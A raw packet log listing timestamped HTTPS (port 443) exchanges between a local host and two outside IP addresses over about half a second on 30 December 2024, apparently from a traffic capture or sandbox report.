                                                                                                                                                                                Dec 30, 2024 19:45:56.675745964 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.675797939 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.675803900 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.675812960 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.675843954 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.675851107 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.675898075 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.675901890 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.675930977 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.675941944 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.675951004 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.675987959 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.676001072 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.676007986 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.676043034 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.676059961 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.676125050 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.676176071 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.676182032 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.676186085 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.676219940 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.676238060 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.676243067 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.676260948 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.676270008 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.676285982 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.676290035 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.676320076 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.676352978 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.684197903 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.684223890 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.684276104 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.684282064 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.684309006 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.684326887 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.685282946 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.685297966 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.685355902 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.685363054 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.685952902 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.685971975 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.686002970 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.686009884 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.686032057 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.686064959 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.687833071 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.687849045 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.687889099 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.687895060 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.687905073 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.687937975 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.688204050 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.688218117 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.688256979 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.688261986 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.688288927 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.688299894 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.688868999 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.688883066 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.688924074 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.688929081 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.688966990 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.688966990 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.743772030 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.743834972 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.743849039 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.743855953 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.743894100 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.744016886 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.744071007 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.744082928 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.744141102 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.744260073 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.744319916 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.744416952 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.744474888 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.744604111 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.744666100 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.744774103 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.744832039 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.744914055 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.744970083 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.745057106 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.745112896 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.745304108 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.745361090 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.762054920 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.762074947 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.762134075 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.762150049 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.762156010 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.762192965 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.762226105 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.775429010 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.775506973 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.775516987 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.775557995 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.775578022 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.775583029 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.775612116 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.775625944 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.775633097 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.775685072 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.775688887 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.775746107 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.775926113 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.775943995 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.775995970 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.776005983 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.776087046 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.776106119 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.776138067 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.776144028 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.776176929 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.776258945 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.776273966 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.776320934 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.776326895 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.776354074 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.776357889 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.776386023 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.776416063 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.776420116 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.776448011 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.776488066 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.776501894 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.776536942 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.776540995 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.776561022 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.776617050 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.776633978 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.776669025 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.776673079 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.776684999 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.790019989 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.798217058 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.834321976 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.834399939 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.834418058 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.834424019 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.834470034 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.834505081 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.834566116 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.834743023 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.834796906 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.834850073 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.834913969 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.835005045 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.835055113 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.835145950 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.835196018 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.835411072 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.835470915 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.835570097 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.835628033 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.835747957 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.835787058 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.835808039 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.835813046 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.835835934 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.835861921 CET44350077192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.840603113 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:56.848332882 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.848350048 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.848443985 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.848453999 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.848515034 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.848531961 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.848568916 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.848575115 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.848599911 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.858074903 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.858088970 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.858156919 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.858163118 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.858220100 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.858238935 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.858274937 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.858280897 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.858294010 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.861841917 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.861860991 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.861922026 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.861927986 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.861947060 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.862330914 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.862349987 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.862389088 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.862392902 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.862421036 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.862626076 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.862639904 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.862689018 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.862692118 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.862704039 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.862715960 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.862720013 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.862744093 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.862773895 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.862777948 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.868592024 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.934886932 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.934907913 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.934957027 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.935003996 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.935102940 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.935102940 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.935116053 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.944423914 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.944442034 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.944488049 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.944495916 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.944531918 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.944684982 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.944709063 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.944741964 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.944747925 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.944776058 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.948158026 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.948174000 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.948239088 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.948245049 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.948438883 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.948457956 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.948492050 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.948497057 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.948527098 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.948710918 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.948724031 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.948760986 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.948765993 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.948786974 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.948926926 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.948945045 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.948978901 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:56.948985100 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:56.949004889 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.020919085 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.020937920 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.021003962 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.021008968 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.021056890 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.021076918 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.021094084 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.021136045 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.021142006 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.021167994 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.030770063 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.030788898 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.030828953 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.030833960 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.030842066 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.030854940 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.030869007 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.030915022 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.030920029 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.034674883 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.034693003 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.034739017 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.034743071 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.034780025 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.034797907 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.034816027 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.034853935 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.034861088 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.034881115 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.035024881 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.035043001 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.035078049 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.035084009 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.035101891 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.035317898 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.035334110 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.035370111 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.035376072 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.035403013 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.107485056 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.107511044 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.107551098 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.107558012 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.107572079 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.107592106 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.107594967 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.107625008 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.107631922 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.107661009 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.117526054 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.117544889 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.117577076 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.117583036 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.117739916 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.117796898 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.117818117 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.117856026 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.117861986 CET4435007645.118.248.184192.168.2.4
